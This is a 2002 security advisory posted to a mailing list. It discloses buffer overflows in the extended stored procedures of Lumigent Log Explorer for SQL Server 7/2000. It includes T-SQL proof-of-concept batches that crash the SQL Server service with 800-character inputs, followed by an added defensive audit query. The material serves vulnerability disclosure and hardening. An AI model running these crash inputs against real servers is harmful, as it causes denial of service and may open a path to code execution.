From: martin rakhmanoff (jimmersyandex.ru)
Date: Fri Jun 14 2002 - 08:05:15 CDT


    Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
    Server 7/2000. It ships with extended stored procedures implemented in
    xp_logattach.dll. Some of them suffer from buffer overflows that lead to
    a crash of the SQL Server service and potentially to arbitrary code
    execution. Below is sample code that crashes SQL Server:

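    -- Each sample is a separate batch: an 800-character argument is passed
    -- to one of the extended stored procedures in xp_logattach.dll.
    declare @bo varchar(8000)
    set @bo = replicate('A', 800)
    exec xp_logattach_StartProf @bo

    declare @bo varchar(8000)
    set @bo = replicate('A', 800)
    exec xp_logattach_setport @bo

    declare @bo varchar(8000)
    set @bo = replicate('A', 800)
    exec xp_logattach @bo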

    Procedures can be run only by dbo (master) by default. Vendor was informed
    but I got no response confirming this problem and no fixes.

    Cheers

    Martin Rakhmanoff (jimmers)
    jimmersyandex.ru
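
The following inventory query is an added example, not part of the original post: it lists the extended stored procedures registered from xp_logattach.dll and any explicit EXECUTE grants on them, so an administrator can confirm the dbo-only default described above still holds. It assumes the SQL Server 7/2000 system tables in master (sysobjects, syscomments, sysprotects, sysusers); the column aliases are illustrative.

```sql
-- Added example: audit of the Log Explorer extended stored procedures
-- on SQL Server 7/2000. Run as a sysadmin.
use master
go

-- 1. Extended stored procedures (xtype = 'X') registered from the DLL.
--    For these objects syscomments.text holds the DLL name or path.
--    '[_]' matches a literal underscore instead of the LIKE wildcard.
select o.name                    as xp_name,
       substring(c.text, 1, 255) as dll
from   dbo.sysobjects  o
join   dbo.syscomments c on c.id = o.id
where  o.xtype = 'X'
  and (o.name like 'xp[_]logattach%'
       or c.text like '%xp[_]logattach.dll%')
go

-- 2. Explicit EXECUTE permissions on those procedures. An empty result
--    means no user or role has been granted access beyond the default.
select o.name as xp_name,
       u.name as grantee,
       case p.protecttype
            when 204 then 'GRANT WITH GRANT OPTION'
            when 205 then 'GRANT'
       end    as permission
from   dbo.sysprotects p
join   dbo.sysobjects  o on o.id  = p.id
join   dbo.sysusers    u on u.uid = p.uid
where  o.xtype = 'X'
  and  o.name like 'xp[_]logattach%'
  and  p.action = 224               -- 224 = EXECUTE
  and  p.protecttype in (204, 205)  -- granted, not denied
go

-- 3. Where Log Explorer is not in use, each procedure listed by step 1
--    can be unregistered (shown for one name; left commented out):
-- exec sp_dropextendedproc 'xp_logattach'
```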